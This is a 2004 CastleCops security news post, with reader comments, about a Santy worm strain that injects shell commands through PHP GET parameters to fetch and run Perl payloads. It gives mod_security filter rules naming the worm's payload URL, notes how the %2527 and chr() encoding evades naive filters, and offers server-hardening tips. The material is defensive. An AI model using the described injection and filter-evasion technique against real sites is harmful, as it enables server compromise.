CastleCops® - New Santy Strain Attacks All PHP Web Scripts!

Need help? Click here to register for free! Absolutely zero advertisements on this site!

**$9736.22 of $21422.68**

Help CastleCops serve the community on new servers, Donate Here to reach our goal.

	Donation/Premium

	Donations. Become Premium Today!

	Security Central

	· Home · PIRT/Fried Phish · MIRT · SIRT · Deutsch · Wiki · Newsletter · O16/ActiveX · CLSID List · Contest2007 · Downloads · Feedback (send) · Forums · HijackThis · Hijacktrend · LSPs · My Downloads · O18 · O20 · O21 · O22 · O23 · O9 · Premium · Private Messages · Proxomitron · Reviews · Search · StartupList · Stories Archive · Submit News · WsIRT · Your Account · Acceptable Use Policy

Survey

Be Advised!: New Santy Strain Attacks All PHP Web Scripts!

Folks, it seems that Santy worm has taken on a new strain. It also searches Yahoo now in addition to Google, but it looks for any PHP scripts with all possible arguments passed thru in the HTTP GET. This worm tries all arguments in your PHP script to throw in a shell commands that access a particular website, download some text files into /tmp, and then execute them using Perl. If you are using Mod_Security, you might want to try something like this (its working for us so far):

SecFilter "visualcoders\.net/spy\.gif\?\&cmd"
SecFilter ":/"

Just in case the URL changes, the latter should still get all sorts of:

http://
ftp://

Naturally, the latter also filters on

%3a%2f

It is Christmas after all, so a quick patch to throw HTTP 406s at the requester works thru the above.

Posted on Saturday, 25 December 2004 @ 16:33:38 UTC by Paul (5710 reads)
[ Trackback ]

"Be Advised!: New Santy Strain Attacks All PHP Web Scripts!" | Login/Create an Account | 15 comments | Search

The comments are owned by the poster. We aren't responsible for their content.

No Comments Allowed for Anonymous, please register

Re: New Santy Strain Attacks All PHP Web Scripts! (Score: 1)
by Paul on Saturday, 25 December 2004 @ 17:21:52 UTC
(User Info | Send a Message | _JOURNAL) http://www.laudanski.com

Ok, the first filter above works, but certainly, the second one has caught some of this now:

operator.netfirms.com

I'd like to think of the second filter as a catch-all.

Re: New Santy Strain Attacks All PHP Web Scripts! (Score: 1)
by Paul on Sunday, 26 December 2004 @ 01:06:53 UTC
(User Info | Send a Message | _JOURNAL) http://www.laudanski.com

Some other basic tips JIC (proceed with caution):

You can try mounting your /tmp with noexec, such that no files are allowed to be executed there. Beware though, other mounts may need it too like /var/tmp, /usr/tmp. This may stop lots of local or remote attacks, but it isn't 100% foolproof either.

You can also chmod 700 or 400 if you like on wget and all *cc* in /usr/bin. This will allow root only access to those files.

Again not 100% foolproof stuff, but certainly can help.

Re: New Santy Strain Attacks All PHP Web Scripts! (Score: 1)
by Paul on Saturday, 25 December 2004 @ 22:28:56 UTC
(User Info | Send a Message | _JOURNAL) http://www.laudanski.com

A lot of these rely on the tick mark:

'

So a really broad filter, for those who are vulnerable it could mean the difference:

SecFilter "'"

Re: New Santy Strain Attacks All PHP Web Scripts! (Score: 1)
by Paul on Sunday, 26 December 2004 @ 01:18:46 UTC
(User Info | Send a Message | _JOURNAL) http://www.laudanski.com

I've seen some folks filtering the echr or esystem from the GET requests. This is flawed, because they are often times preceded by

%2525echr(x)

Where x is any character.

This turns into

%.chr(x)

Which is a concatenation in PHP, and the chr is a function call from php:

http://php.net/chr

So filtering on echr or esystem is not valid, as e is part of the hexadecimal code, and simply put, it can be replaced with another hex code, then the echr filter would not match.

Filtering then on chr doesn't work either, because you can multiple false positive matches:

chris
christmas
christ
etc

Instead of focusing on the good characters, you need to focus on the bad characters like the tick mark.

Re: New Santy Strain Attacks All PHP Web Scripts! (Score: 1)
by Paul on Sunday, 26 December 2004 @ 10:32:30 UTC
(User Info | Send a Message | _JOURNAL) http://www.laudanski.com

Although it is admirable that this new strain be called 'santy.c', I have
noticed on the web that folks seem to think it is still only phpbb
highlight related. That in and of itself is creating a communications
issue. 20/20 hindsight right? Academically, it should have been titled
differently.

From my mod_security filters, I have found today (10 hours) the following
statistics in matches (random verification sampling shows no FPs thus
far) as of about 30 minutes ago:

Filter -> # of matches

%27 -> 51
:/ -> 21,565
' -> 3405 attempts
visualcoders\.net/spy\.gif\?\&cmd -> 53,890
%2527 -> 725

Re: New Santy Strain Attacks All PHP Web Scripts! (Score: 1)
by Robin on Sunday, 26 December 2004 @ 21:40:31 UTC
(User Info | Send a Message)

/paul

I might also add that if you using mod_rewrite to redirect those source IP addresses which match your filters, redirect them to localhost: 127.0.0.1. This way, they continue to inflict the requests upon themselves. If traffic is generated, why let more of it onto the Net?

Re: New Santy Strain Attacks All PHP Web Scripts! (Score: 1)
by tank863 on Sunday, 26 December 2004 @ 23:38:11 UTC
(User Info | Send a Message) http://tankweb.net

Paul

My host uses modsecurity...
I use CPGNuke 8.2B now...

How can I set up rules using the .htaccess

Or should I find out if my host set up the rules and send them this link?

Chris (Tank863)

]

Re: New Santy Strain Attacks All PHP Web Scripts! (Score: 1)
by Robin on Monday, 27 December 2004 @ 00:09:36 UTC
(User Info | Send a Message)

Hi Chris, I was contemplating releasing suggestions for PHP, mod_rewrite, and mod_security. Are you running filters now?

/paul

]

Re: New Santy Strain Attacks All PHP Web Scripts! (Score: 1)
by tank863 on Monday, 27 December 2004 @ 13:55:40 UTC
(User Info | Send a Message) http://tankweb.net

Robin/Paul

Right now I do not know if my host is running any of the filters. I do know that they have mod_security installed... I have asked them.

I will ask to see if they have any filters going.. they are pretty good and on the ball.

If not.. what can I include in my .htaccess file?

Chris (Tank863)

]

Re: New Santy Strain Attacks All PHP Web Scripts! (Score: 1)
by Paul on Monday, 27 December 2004 @ 22:00:02 UTC
(User Info | Send a Message) http://www.laudanski.com

Ok, I'm working on the next article now.

]

Re: New Santy Strain Attacks All PHP Web Scripts! (Score: 1)
by Snail on Tuesday, 28 December 2004 @ 15:07:45 UTC
(User Info | Send a Message)

Pitty bad programmers keep finding new ways to old solutions.

Isn't it just amazing how once again, people using Proxomitron don't suffer this problem?

Re: New Santy Strain Attacks All PHP Web Scripts! (Score: 1)
by Paul on Tuesday, 28 December 2004 @ 17:15:51 UTC
(User Info | Send a Message) http://www.laudanski.com

Actually, this doesn't affect the home user, it affects the web site itself.

]

Re: New Santy Strain Attacks All PHP Web Scripts! (Score: 1)
by Snail on Tuesday, 28 December 2004 @ 17:53:25 UTC
(User Info | Send a Message)

I host a website from my home, as do most of my friends.
So, I was looking at it from that perspective.

Also, their is no reason nodes and larger hosts can't use proxo.

I simply find it a shame that a problem like this exists when a countermeasure has been available since before the problem.

]

Re: New Santy Strain Attacks All PHP Web Scripts! (Score: 1)
by Snail on Tuesday, 28 December 2004 @ 17:58:30 UTC
(User Info | Send a Message)

What this really says, is that people simply are not using adiquate security measures already freely in existance and that bad code by way of this failure is being allowed to spread.

]

Re: New Santy Strain Attacks All PHP Web Scripts! (Score: 1)
by Paul on Tuesday, 28 December 2004 @ 21:59:19 UTC
(User Info | Send a Message) http://www.laudanski.com

I agree that the code in use today for many packages can be improved. That goes from the backend stuff to even the desktop stuff.

]

	Login

	Nickname Password Security Code: Type Security Code: Usage signifies AUP acceptance · New User? · Click here to create a registered account.

	Related Links

	· del.icio.us! · digg it! · reddit! · TrackBack (0) · PHP HomePage · HotScripts · Google Search Engine · W3 Consortium · More about Worms · News by Paul Most read story about Worms: Kama Sutra/Blackworm Worm Timebomb

	Article Rating

	Average Score: 0 Votes: 0 Please take a second and vote for this article:

	Options

	Printer Friendly Page


	2002-2008 � Computer Cops LLC dba CastleCops®. All rights reserved. Acceptable Use Policy. Use signifies your agreement. 173ppm 0.301s (0.042s) Making cybercriminals unhappy since 2002*